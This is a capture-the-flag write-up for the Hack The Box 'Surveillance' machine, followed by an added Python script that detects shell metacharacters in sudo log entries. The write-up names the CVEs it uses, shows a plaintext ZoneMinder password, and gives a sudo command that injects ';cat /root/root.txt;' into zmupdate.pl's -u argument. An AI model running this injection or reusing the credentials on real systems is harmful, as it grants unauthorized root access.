HTB surveillance

Writeup for the HTB Surveillance box

rated: medium category: web

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT
Nmap scan report for 10.10.11.245
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds

A CMS, Craft CMS, is running on port 80.

It is vulnerable to RCE (CVE-2023-41892).

There are 2 users:

  • matthew
  • zoneminder

With further enumeration we find a backup file, surveillance--2023-10-17-202801--v4.4.14.sql.zip. It contains a SQL backup of the database, and from it we get creds for the user matthew.

user.txt 260ecc03cedb8e78d80a6658b5b22eac

We also get the creds for zoneminder in the ZoneMinder config files. Password: ZoneMinderPassword2023

ZoneMinder is a service running on port 8080, so we tunnel over SSH to access it.

It is vulnerable to RCE (CVE-2023-26035).

To escalate privileges and read the root flag:

sudo /usr/bin/zmupdate.pl -v 1.19.0 -u ";cat /root/root.txt;"

root.txt 13630834b0c9c6f122557097788d8e25
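
On the defensive side, sudo logs the full command line it runs, so shell metacharacters passed in the -u argument to zmupdate.pl are visible in the COMMAND field. The following detection sketch is an added example, not part of the original writeup; it assumes the classic syslog-style sudo record format, and the sample log lines (host name, timestamps, TTYs, the zmuser name) are constructed.

```python
import re

# Shell metacharacters that have no place in a DB user name or version string.
SHELL_META = re.compile(r"[;&|`$()<>\\\n]")
# Assumed syslog-style sudo record:
#   "<host> sudo: <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmdline>"
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)
WATCHED = "/usr/bin/zmupdate.pl"  # binary from the writeup's sudo invocation


def suspicious_sudo(lines, watched=WATCHED):
    """Return (user, runas, command) for sudo runs of `watched` whose
    arguments contain shell metacharacters."""
    hits = []
    for line in lines:
        m = SUDO_LINE.search(line.rstrip("\n"))
        if not m:
            continue  # not a sudo command record
        path, _, args = m["cmd"].partition(" ")
        if path == watched and SHELL_META.search(args):
            hits.append((m["user"], m["runas"], m["cmd"]))
    return hits


# Constructed sample auth.log lines for illustration only.
SAMPLE = [
    "Feb 28 15:01:02 host sudo: zoneminder : TTY=pts/0 ; PWD=/tmp ; "
    "USER=root ; COMMAND=/usr/bin/zmupdate.pl -v 1.19.0 -u zmuser",
    "Feb 28 15:02:11 host sudo: zoneminder : TTY=pts/0 ; PWD=/tmp ; "
    "USER=root ; COMMAND=/usr/bin/zmupdate.pl -v 1.19.0 -u ;cat /root/root.txt;",
    "Feb 28 15:03:40 host sudo: matthew : TTY=pts/1 ; PWD=/home/matthew ; "
    "USER=root ; COMMAND=/usr/bin/id",
    "Feb 28 15:04:00 host sshd[991]: Accepted password for matthew "
    "from 192.0.2.10 port 50000 ssh2",
]

if __name__ == "__main__":
    for user, runas, cmd in suspicious_sudo(SAMPLE):
        print(f"ALERT {user} -> {runas}: {cmd}")
```

The same metacharacter check, applied as input validation on the argument before it reaches any shell, is the corresponding hardening for a script that is allowed under sudo.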

Licensed under CC BY-NC-SA 4.0